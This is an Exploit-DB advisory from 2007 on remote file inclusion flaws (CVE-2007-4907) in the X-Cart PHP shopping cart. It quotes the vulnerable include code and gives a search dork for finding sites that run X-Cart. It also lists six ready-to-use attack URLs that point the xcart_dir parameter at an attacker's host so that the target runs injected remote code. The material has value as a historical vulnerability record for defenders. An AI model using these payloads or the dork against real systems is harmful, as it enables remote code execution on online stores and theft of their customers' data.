X-Cart <= ? Multiple Remote File Inclusion Vulnerabilities

2007-09-11T00:00:00
ID EDB-ID:4396
Type exploitdb
Reporter aLiiF
Modified 2007-09-11T00:00:00

Description

X-Cart <= ? Multiple Remote File Inclusion Vulnerabilities. CVE-2007-4907. Webapps exploit for php platform

                                        
                                            ## xCart Remote file inclusion ##

## Download script : http://www.x-cart.com//

## Discovered By : aLiiF a.k.a [arif] @debuteam 07/09/2007

## HomePage : http://www.debuteam.net//

## Thx to : Debu Newbie Payment Yogac nyubi Rozi ^S0n_g0ku^
Kuris Sonix Toxicity newbi3 R4yn4ld0 DisJocKey
s3ng0k home_edition Holong home_edition2001
th0nk Scr3W_W0rm jayoes and aLL @Debutem @Mildnet



########### ###########
## ##
## 333 444555 HH HH KK K ##
## 333 3332222 444 555 1133311 HH HH KK K ##
## 333 33322222 444 55 11 11 HH HH #### 00000 KKKK ##
## 333 333 22 444 55 11 11 HHaaHH ## 00 KKK ##
## 333 333 22 444 55 11 11 HH HH ##### 00 KKKK ##
## 333 333 22 444 555 11 11 HH HH # ## 00 KK K ##
## 333 333 22 444555 1133311 HH HH ##### 00000 KK K ##
## ##
########## ##########



/*****************************************************************************\
+-----------------------------------------------------------------------------+
| X-Cart |
| Copyright (c) 2001-2004 Ruslan R. Fazliev &lt;rrf@rrf.ru&gt; |
| All rights reserved. |
+-----------------------------------------------------------------------------+
#
# $Id: config.php,v 1.297.2.9 2004/02/05 12:25:43 mclap Exp $
#
# Global definitions & common functions
#

@include $xcart_dir."/prepare.php";

#
# Create Smarty object
#
if (!@include $xcart_dir."/smarty.php") {


#################################################################################


## Dork : "X-CART. Powerful PHP shopping cart software" ##
## ##


=-=-=-=-= () ExPloit () =-=-=-=-= =-=-=-=-= () ExPloit () =-=-=-=-=


## http://www.target.com/[xcart-path]/config.php?xcart_dir=http://urhost/[inject]?
## http://www.target.com/[xcart-path]/prepare.php?xcart_dir=http://urhost/[inject]?
## http://www.target.com/[xcart-path]/smarty.php?xcart_dir=http://urhost/[inject]?
## http://www.target.com/[xcart-path]/customer/product.php?xcart_dir=http://urhost/[inject]?
## http://www.target.com/[xcart-path]/provider/auth.php?xcart_dir=http://urhost/[inject]?
## http://www.target.com/[xcart-path]/admin/auth.php?xcart_dir=http://urhost/[inject]?

===================================================================


## Contack person : aliif@debuteam.net

## ViVa Debuteam !!! 

# milw0rm.com [2007-09-11]